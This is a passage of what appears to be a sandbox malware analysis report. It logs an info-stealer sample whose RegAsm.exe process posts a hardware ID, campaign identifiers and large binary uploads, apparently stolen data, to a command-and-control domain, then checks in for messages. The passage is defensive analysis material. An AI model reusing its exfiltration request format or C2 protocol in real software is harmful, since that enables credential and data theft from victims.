2024-11-14 07:08:29 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a Data Ascii: 11ok 173.254.250.91
2024-11-14 07:08:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49711	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:30 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=P24M2DAMO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20518 Host: marshal-zhukov.com
2024-11-14 07:08:30 UTC	15331	OUT	Data Raw: 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --P24M2DAMOContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--P24M2DAMOContent-Disposition: form-data; name="pid"3--P24M2DAMOContent-Disposition: form-data; name="lid"yau6Na--6928154717--P24M2DAMOContent
2024-11-14 07:08:30 UTC	5187	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2024-11-14 07:08:30 UTC	1023	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iq01r9dc2088fd2584hj140eeq; expires=Mon, 10-Mar-2025 00:55:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFzETtfOxsC8ZE5sl9YwiGUjyqipAZq%2BRwhl0V%2Fx8auh71U2umQNu%2BmEVFBleyvOHEl17l2wuOwB6jodJHg4BSGrtkpH%2B7jf3aG5KygyZ8lFvPRP%2FvH%2Fi51IGktmj1KxSjlsJM0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252bb06baa464d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1129&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21473&delivery_rate=2429530&cwnd=251&unsent_bytes=0&cid=7c3c624f70271fbd&ts=540&x=0"
2024-11-14 07:08:30 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a Data Ascii: 11ok 173.254.250.91
2024-11-14 07:08:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49712	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:31 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D8I0HQKDVAZZVINLCED User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1267 Host: marshal-zhukov.com
2024-11-14 07:08:31 UTC	1267	OUT	Data Raw: 2d 2d 44 38 49 30 48 51 4b 44 56 41 5a 5a 56 49 4e 4c 43 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 44 38 49 30 48 51 4b 44 56 41 5a 5a 56 49 4e 4c 43 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 38 49 30 48 51 4b 44 56 41 5a 5a 56 49 4e 4c 43 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 Data Ascii: --D8I0HQKDVAZZVINLCEDContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--D8I0HQKDVAZZVINLCEDContent-Disposition: form-data; name="pid"1--D8I0HQKDVAZZVINLCEDContent-Disposition: form-data; name="lid"yau6Na--69
2024-11-14 07:08:31 UTC	1016	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qs6u77trerltdjsjo4nkau7819; expires=Mon, 10-Mar-2025 00:55:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgqVI%2Fz6tbMRT2EoR%2FH5gjQAdgoy2ah750bbv%2BD5Q6DuJScnV6D3CHlNAxi9HiDCCWSiqvF1tyHbILYURNnFYOGDHLcHTXLFGUtspWeacN6KSKbltED3NwxtXqrzwCsRSTB3%2BXE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252bb92fd0478b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2187&delivery_rate=1654857&cwnd=251&unsent_bytes=0&cid=ec16050eb9fb99fc&ts=563&x=0"
2024-11-14 07:08:31 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a Data Ascii: 11ok 173.254.250.91
2024-11-14 07:08:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49713	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:32 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8FZDPWUZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 586109 Host: marshal-zhukov.com
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --8FZDPWUZContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--8FZDPWUZContent-Disposition: form-data; name="pid"1--8FZDPWUZContent-Disposition: form-data; name="lid"yau6Na--6928154717--8FZDPWUZContent-Dis
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e 3b 88 b9 4f ae 5f 18 38 3e c8 74 f6 c1 81 96 f9 4d 6f 0b 74 bc e4 53 e7 72 48 49 03 a6 4a f2 4b 75 69 41 9b ef d3 22 13 3f Data Ascii: um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYed7${~)7-uy%_`Mj>8^Ii9H;(!MN;O_8>tMotSrHIJKuiA"?
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b dd d4 58 8e 0e 60 3e a8 19 a9 b5 e6 60 65 69 b8 11 29 b0 ea a1 65 7e 7e ee c4 ee 69 1d 9f a0 3b a3 3b c5 69 58 b8 ba b9 e8 Data Ascii: > s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[X`>`ei)e~~i;;iX
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd f7 1f ae c1 57 6e 7c 8f 00 4d 15 f4 14 de 9e 7c 6b 94 7a 32 5b a4 9e 2d 59 ae 4e 7c 4b af b5 69 5c 7c 99 ba f6 c4 ac f8 b7 Data Ascii: evL!`Zxm'VT>TG.<;\|d0%2b{A-=dSOS8+LWJVS\|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd\|kYWn\|M\|kz2[-YN\|Ki\\|
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7 f4 83 b7 ad 20 95 58 87 4b 40 20 38 67 d2 b8 7e 8e c0 26 dc 15 0d e0 2b 22 6b d1 dd 68 50 ca 53 9e 87 8f d2 48 fa e9 32 3c Data Ascii: B06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@ XK@ 8g~&+"khPSH2<
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd 8e 9e 6b 06 1a 03 4a 01 9c bb a2 56 fb 02 24 fa c7 3d 33 74 e2 09 71 8e 06 ab 9c 35 ad a2 3f c8 d9 84 f5 ee 3f 2c 05 b2 70 Data Ascii: oBRohu.-~ZMe\|TY=AHk>6!rd=FrGpSXU&*e(&D[}\|A+IsFJ?6LAjbH<["\<4?(wV~R]pbYkJV$=3tq5??,p
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34 ff 00 a1 12 e6 9a 7f 30 ef a6 e8 dc 13 67 1c c3 68 fd ec b1 35 6b 96 c3 f3 fa 1b 9d 63 3b 56 81 77 5d d9 b2 e6 fb 8e fb 4c Data Ascii: 8_5V,{0<b 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~40gh5kc;Vw]L
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65 28 c7 e0 f7 fd 81 b3 a6 a8 3a d5 ea d5 9b 8d 69 0e 77 f0 59 b1 d3 6b f6 40 0a 3c 9a 7d e9 85 04 89 a7 57 d0 4b 46 e3 f5 a7 Data Ascii: Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe(:iwYk@<}WKF
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b c3 c3 05 f3 d7 15 ee e7 3d 52 30 05 8e ae 02 a8 7c f9 b0 d0 78 38 09 25 3a 0b 8d 09 2f 3e df 42 38 0b c9 ce 2c d7 00 1b a4 Data Ascii: 2 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy\|&3k (^O^_nS\kcuB[r-I`={=R0\|x8%:/>B8,
2024-11-14 07:08:32 UTC	15331	OUT	Data Raw: 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60 63 20 54 97 78 6a 58 63 d5 9a 55 25 27 1d 84 86 92 c8 8d 31 08 2e 52 0c f5 1e b9 fd c9 31 7c 5f 12 1c be fa 57 89 65 5d 71 Data Ascii: ETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?\| <4ra:~bhhMa`c TxjXcU%'1.R1\|_We]q
2024-11-14 07:08:35 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j7knarksick4ui3fataikeo2nj; expires=Mon, 10-Mar-2025 00:55:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VRqU4qFuIB4EJIxgvgyp0PNcF4x2BmUEaHTvQRuOFeEegnhJ0P%2BRttNDu3hvoRFV4g7Eq33Ox2Wmj4WBkWUDbuKJeld2Mki4cQYZhYvhXXQRBfQVocSfiOeXaNvG0Jf2HR9K6YA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252bc26d042e18-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1050&sent=222&recv=627&lost=0&retrans=0&sent_bytes=2848&recv_bytes=588692&delivery_rate=2623188&cwnd=229&unsent_bytes=0&cid=cbbaaa55c39e399c&ts=2434&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49715	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:36 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: marshal-zhukov.com
2024-11-14 07:08:36 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d 26 68 77 69 64 3d 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6928154717&j=&hwid=BDB1EF992B1E438FCEC5E79E34E047A9
2024-11-14 07:08:36 UTC	1019	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lmjlvp3gmvdt2g16qjs0eudiso; expires=Mon, 10-Mar-2025 00:55:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvw%2FGBSTQUMlcAJxfdG6SNAY6x46a%2FumK7T7CIcVXC6jnQetgLkhdI97mbtm4%2BCKdbMUN%2Bi%2F78ZjM6T5qS9FzJOTc6za%2BilLtAngTa4j0vkoYrLv55F0UaClojuHunrRkCh7NMg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252bd57a9c6bb9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1053&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=989&delivery_rate=2686456&cwnd=251&unsent_bytes=0&cid=6da4e7d39aa22fb4&ts=491&x=0"
2024-11-14 07:08:36 UTC	54	IN	Data Raw: 33 30 0d 0a 43 58 76 39 57 55 30 43 50 55 51 43 4f 67 79 37 5a 37 66 59 62 38 72 63 4e 72 4a 72 31 39 79 44 67 56 6f 35 30 6f 54 79 76 44 31 53 4a 67 3d 3d 0d 0a Data Ascii: 30CXv9WU0CPUQCOgy7Z7fYb8rcNrJr19yDgVo50oTyvD1SJg==
2024-11-14 07:08:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:08:16
Start date:	14/11/2024
Path:	C:\Users\user\Desktop\nlJ2sNaZVi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nlJ2sNaZVi.exe"
Imagebase:	0xb80000
File size:	45'056 bytes
MD5 hash:	5E443F31B2CF8B956AFEC50AD5C0F839
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:08:19
Start date:	14/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"
